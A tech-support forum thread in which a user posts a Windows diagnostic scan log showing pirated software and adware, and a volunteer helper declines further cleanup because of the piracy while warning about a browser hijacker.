2008-06-03 17:06 - 2008-06-03 17:06 - 00269080 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\Reference 2009\ERSREGPR.DLL
2008-06-03 17:06 - 2008-06-03 17:06 - 00228120 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\Reference 2009\MSENCDAT.DLL
2008-06-03 17:06 - 2008-06-03 17:06 - 00178968 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\Reference 2009\ENCCONT.DLL
2008-06-03 17:06 - 2008-06-03 17:06 - 00351000 _____ () C:\Program Files (x86)\Common Files\Microsoft Shared\Reference 2009\MSENCXML.DLL
2008-06-03 17:05 - 2008-06-03 17:05 - 00068376 _____ () C:\Program Files (x86)\Microsoft Student\Microsoft Student with Encarta Premium 2009 DVD\EDICTEIT.EBK
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2013-08-22 21:25 - 2015-10-18 01:17 - 00001132 ____A C:\Windows\system32\Drivers\etc\hosts
 
127.0.0.1                   activate.adobe.com
127.0.0.1                   practivate.adobe.com
127.0.0.1                   lmlicenses.wip4.adobe.com
127.0.0.1                   lm.licenses.adobe.com
127.0.0.1                   na1r.services.adobe.com
127.0.0.1                   hlrcv.stage.adobe.com
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Neki\AppData\Roaming\Microsoft\Windows Photo Viewer\Windows Photo Viewer Wallpaper.jpg
DNS Servers: 192.168.8.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
HKLM\...\StartupApproved\Run: => "AtwtusbIcon"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\StartupApproved\StartupFolder: => "Download Adobe Photoshop CC 14.2 Final Multilanguage [ChingLiu] Torrent - KickassTorrents.lnk"
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\StartupApproved\Run: => "uTorrent"
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\StartupApproved\Run: => "DAEMON Tools Ultra Agent"
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\StartupApproved\Run: => "EPLTarget\P0000000000000000"
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\StartupApproved\Run: => "EPLTarget\P0000000000000001"
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\StartupApproved\Run: => "CCleaner Monitoring"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{0DBE97CB-0CAD-4128-83EC-DEF98BC1B130}] => (Allow) C:\Program Files\KMSpico\KMSELDI.exe
FirewallRules: [{FCD6D704-BDFC-4A21-A521-1EA25209E098}] => (Allow) C:\Program Files\KMSpico\KMSELDI.exe
FirewallRules: [{FE26A68E-E99A-42EB-8AA8-180E99FD5B22}] => (Allow) C:\Program Files\KMSpico\AutoPico.exe
FirewallRules: [{CAE18944-8533-46A7-BE1F-2790013F2FEB}] => (Allow) C:\Program Files\KMSpico\AutoPico.exe
FirewallRules: [{68565AE1-E2E7-46B5-B002-D6A7117FF945}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [{D7DB9A5E-F7C1-4F2E-92B3-B5B06C33FD1E}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [{D2945828-0816-4170-892D-4031D58A12BB}] => (Allow) C:\Users\Neki\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{B8EF5B78-E1B6-4EBD-A503-A91EBD40E031}] => (Allow) C:\Users\Neki\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{B205996D-DD71-4BE0-9881-0E43E82B2976}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{2C5681D7-B388-4CDA-AF0C-A64759D84B85}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{6D52B509-E0E8-4A45-84ED-D3B466DE40C1}C:\xampp\apache\bin\httpd.exe] => (Allow) C:\xampp\apache\bin\httpd.exe
FirewallRules: [UDP Query User{FB78DA53-AD21-467A-B183-C72FF026594B}C:\xampp\apache\bin\httpd.exe] => (Allow) C:\xampp\apache\bin\httpd.exe
FirewallRules: [TCP Query User{00CB10E3-4EF7-4192-8BFF-B98CD6E34009}C:\xampp\mysql\bin\mysqld.exe] => (Allow) C:\xampp\mysql\bin\mysqld.exe
FirewallRules: [UDP Query User{46761719-CFA6-4D4F-B6EB-64A793CC1C84}C:\xampp\mysql\bin\mysqld.exe] => (Allow) C:\xampp\mysql\bin\mysqld.exe
FirewallRules: [TCP Query User{1822D9A0-67BF-4EF9-AB9E-59ECF4CE1697}C:\xampp\filezillaftp\filezillaserver.exe] => (Block) C:\xampp\filezillaftp\filezillaserver.exe
FirewallRules: [UDP Query User{0AEAAB7C-F053-44E1-9764-40868C346CD7}C:\xampp\filezillaftp\filezillaserver.exe] => (Block) C:\xampp\filezillaftp\filezillaserver.exe
FirewallRules: [{AF0256BB-5DCE-4FB7-8DF4-40BD728EBF00}] => (Allow) C:\Program Files (x86)\FreeFileViewer\FFVCheckForUpdates.exe
FirewallRules: [{A4559FD4-F9E4-4726-B71D-CC0BA5346F07}] => (Allow) C:\Program Files (x86)\File Type Assistant\TSAssist.exe
FirewallRules: [TCP Query User{FFD63742-1A99-4023-A8EC-3100F80166B7}C:\program files (x86)\java\jre1.8.0_45\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_45\bin\javaw.exe
FirewallRules: [UDP Query User{51AF617B-8045-4856-ACE3-A8A32E74B860}C:\program files (x86)\java\jre1.8.0_45\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_45\bin\javaw.exe
FirewallRules: [TCP Query User{05D5AB32-50D0-42AC-BC33-52460CB89079}C:\users\neki\desktop\left 4 dead 2\left4dead2.exe] => (Block) C:\users\neki\desktop\left 4 dead 2\left4dead2.exe
FirewallRules: [UDP Query User{A03726B9-AB54-41FF-9252-F7A917EC836D}C:\users\neki\desktop\left 4 dead 2\left4dead2.exe] => (Block) C:\users\neki\desktop\left 4 dead 2\left4dead2.exe
FirewallRules: [TCP Query User{CC318DE9-780B-4275-A749-0113746177EB}C:\program files (x86)\videolan\vlc\vlc.exe] => (Block) C:\program files (x86)\videolan\vlc\vlc.exe
FirewallRules: [UDP Query User{081E81E9-31C7-49B1-B450-D64E2597ED83}C:\program files (x86)\videolan\vlc\vlc.exe] => (Block) C:\program files (x86)\videolan\vlc\vlc.exe
FirewallRules: [TCP Query User{CA64ADEF-848C-4AA9-B0FA-0863E5B19652}C:\users\neki\desktop\sci-chris\games\left 4 dead 2\left4dead2.exe] => (Allow) C:\users\neki\desktop\sci-chris\games\left 4 dead 2\left4dead2.exe
FirewallRules: [UDP Query User{4C25E113-D2F3-443F-8146-78475D19F32D}C:\users\neki\desktop\sci-chris\games\left 4 dead 2\left4dead2.exe] => (Allow) C:\users\neki\desktop\sci-chris\games\left 4 dead 2\left4dead2.exe
FirewallRules: [{F31D87E7-A355-4D09-9587-B7849E5BDF37}] => (Allow) C:\Program Files (x86)\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{1749066D-8CFF-472D-8D0E-41EFCCECB291}] => (Allow) C:\Program Files (x86)\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{B5BC5BD9-8C5E-44E0-8748-4731BC784180}] => (Allow) C:\Program Files (x86)\LuckyBrowse\app\LuckyBrowse.exe
FirewallRules: [{B72F015E-8B9F-4D57-9601-85E3BA845916}] => (Allow) C:\Program Files (x86)\LuckyBrowse\app\LuckyBrowse.exe
FirewallRules: [TCP Query User{BBDBD78B-8264-43EF-80DC-966A67525B85}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{20EF9C06-CD3D-4EAE-AA1C-F2917ACC6A27}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{688F899E-F9C7-4BC2-AA9A-97D76A7DE20A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Restore Points =========================
 
15-01-2016 21:28:06 Scheduled Checkpoint
29-01-2016 00:37:24 Scheduled Checkpoint
02-02-2016 23:53:10 JRT Pre-Junkware Removal
 
==================== Faulty Device Manager Devices =============
 
Name: 
Description: 
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (02/03/2016 12:17:17 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (02/03/2016 12:17:09 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (02/03/2016 12:16:40 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (02/03/2016 12:16:35 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (02/03/2016 12:06:07 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (02/03/2016 12:05:42 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (02/02/2016 11:59:11 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (02/02/2016 11:58:57 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (02/02/2016 11:38:03 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=NetworkAvailable
 
Error: (02/02/2016 11:37:59 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0xC004F074
Command-line arguments:
RuleId=502ff3ba-669a-4674-bbb1-601f34a3b968;Action=AutoActivateSilent;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=c06b6981-d7fd-4a35-b7b4-054742b7af67;NotificationInterval=1440;Trigger=UserLogon;SessionId=1
 
 
System errors:
=============
Error: (02/02/2016 11:37:16 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Globe Tattoo Broadband. OUC service failed to start due to the following error: 
%%1053
 
Error: (02/02/2016 11:37:16 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Globe Tattoo Broadband. OUC service to connect.
 
Error: (02/02/2016 11:35:40 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Search service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.
 
Error: (02/02/2016 11:35:40 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Nonchalant Necessary service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (02/02/2016 11:35:40 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Mobile Broadband HL Service service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (02/02/2016 11:35:40 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The HWDeviceService64.exe service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (02/02/2016 11:35:39 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Print Spooler service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 5000 milliseconds: Restart the service.
 
Error: (02/02/2016 11:35:39 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Wacom Professional Service service terminated unexpectedly.  It has done this 1 time(s).
 
Error: (02/02/2016 05:27:28 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The Globe Tattoo Broadband. OUC service failed to start due to the following error: 
%%1053
 
Error: (02/02/2016 05:27:28 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: A timeout was reached (30000 milliseconds) while waiting for the Globe Tattoo Broadband. OUC service to connect.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i3 CPU M 380 @ 2.53GHz
Percentage of memory in use: 74%
Total physical RAM: 1782.86 MB
Available physical RAM: 453.86 MB
Total Virtual: 3958.86 MB
Available Virtual: 2391.54 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:224.61 GB) (Free:79.32 GB) NTFS
Drive d: () (Fixed) (Total:240.81 GB) (Free:132.1 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 5B227C29)
Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=224.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=240.8 GB) - (Type=07 NTFS)
 
==================== End of Addition.txt ============================


#4 satchfan

satchfan

  • Malware Response Team
  • 2,661 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Devon, UK
  • Local time:02:22 PM

Posted 02 February 2016 - 12:37 PM

Thanks for the logs Neki. I'm afraid I have to go out for a while but will reply in a few hours when I get back and have checked your logs.

 

Satchfan


My help is always free of charge. If you are happy with the help provided, if you wish you can make a donation to buy me a beer.


#5 Neki


Posted 02 February 2016 - 12:56 PM

No problem! This isn't really urgent anyway. Have a great time! :)



#6 satchfan


Posted 02 February 2016 - 05:59 PM

You have multiple infections on your computer but you have a lot of illegal software on your system, which is probably how your computer became infected. Besides being illegal, cracks/keygens are the most certain means of infecting your system, as ALL illegal software contains some form of malicious code.

This forum, as well as all the other well-respected malware removal forums, does not condone the use of illegal software. If you disregard this warning and become re-infected, we may not assist you the next time.

If you want your computer cleaned, please uninstall all the illegal software that you have downloaded and installed. When you have done this, run the following and post the log:

Run CKScanner

Download CKScanner by askey127 from here & save it to your Desktop.

  • double-click CKScanner.exe then click Search For Files
  • when the cursor hourglass disappears, click Save List To File
  • a message box will verify the file saved
  • double-click the CKFiles.txt icon on your desktop then copy/paste the contents in your next reply.

Satchfan

 




#7 Neki


Posted 03 February 2016 - 11:19 AM

Hmm, I see. Thanks for the warning Satchfan but frankly, I couldn't do that. I badly need these programs and I don't really have the money to own them legally. If I get re-infected and you or anyone else won't assist me the next time I ask for help, then I don't really mind. It's fine by me. After all, all I ever asked for anyway is if it's safe for those registry files detected by AdwCleaner to undergo the 'cleaning' process, which I assume it is. At least now, I learned some new stuff that could be useful.

 

My computer still works fine, and it did even before I initiated the steps you required me to do. It's been fine ever since, actually. No really computer-threatening malware or other viruses have affected my computer, nor have they messed it up. The only problem was those annoying ads that started popping up, and that's all I wanted to get rid of.

 

I don't mind not getting my computer fully cleaned. This is my own choice and I know the repercussions, and if ever there is other dangerous stuff left, then I'm taking the risk because I am not going to give up the programs.

 

But thanks a lot for helping me out at least.


Edited by Neki, 04 February 2016 - 08:48 AM.


#8 satchfan


Posted 03 February 2016 - 12:46 PM

> thanks a lot for helping me out at least.

You're welcome.

 

I understand but I'm afraid that if I help you with these items still on your computer it would be seen as condoning/encouraging piracy.

 

You say your computer works fine but there are signs of this and websearch.searchsun.info which hijacks your IE/Chrome/Firefox and changes your homepage. In your case it is Chrome that is infected.

You would be wise to uninstall the pirated software (albeit temporarily, as it is not my business what you do when you leave here).

If you still choose not to uninstall the programs, at least look up these infections but do not use ANY program that you have not seen used on our forum as there are some suspect programs that will claim to rid you of these infections but can/will do more damage than good.

Whatever your decision, thank you for replying and I wish you luck.

Regards

Satchfan


Edited by satchfan, 03 February 2016 - 12:49 PM.



#9 Neki


Posted 04 February 2016 - 10:09 AM

> I wish you luck.

Thank you very much.

 

Thanks also for understanding but I deeply apologize for the piracy I'm doing. I'm simply a student with nothing to earn money from but I would really be willing to actually buy software products for my PC if I'll ever get a job someday from which I can earn. At the moment, I'm just desperate.

 

Without any doubts, I am firm with my decision to keep the programs installed.

> do not use ANY program that you have not seen used on our forum as there are some suspect programs that will claim to rid you of these infections but can/will do more damage than good.

I'm not really sure what you're saying here, but do you mean to say that I also shouldn't continue using AdwCleaner, JRT and FRST anymore?


Edited by Neki, 05 February 2016 - 07:23 AM.


#10 satchfan


Posted 04 February 2016 - 12:30 PM

> I'm not really sure what you're saying here, but do you mean to say that I also shouldn't continue using AdwCleaner, JRT and FRST anymore?

 

Yes, those programs are safe (although FRST is not much good to you if you don't know what the results mean).

 

What I meant was that if you look up information about some infections on the Internet, there are "solutions" which suggest running "clean-up" programs for those infections; however, those clean-up programs are generally not effective or safe.

 

Only use those that you have seen being used on this forum, e.g. AdwCleaner, Junkware Removal Tool, Malwarebytes or a good online scan like ESET Online Scanner. Those are all safe for you to use.

 

Satchfan




#11 Neki


Posted 05 February 2016 - 09:11 AM

Ah, got it. Yeah, I actually don't mind those clean-up programs too. Just by looking at them, I could already tell that they seem fake and couldn't be trusted. That's why I scour the net and search forums to find ones that are reliable.

 

Well...for the last time, thank you, thank you very much. It's been a big help. And to top it off, amen to you and the whole Bleepingcomputer community. :)


Edited by Neki, 05 February 2016 - 09:19 AM.


#12 satchfan


Posted 05 February 2016 - 09:29 AM

You're welcome. Sorry I couldn't do more.

 

Nina




#13 satchfan


Posted 05 February 2016 - 09:32 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.





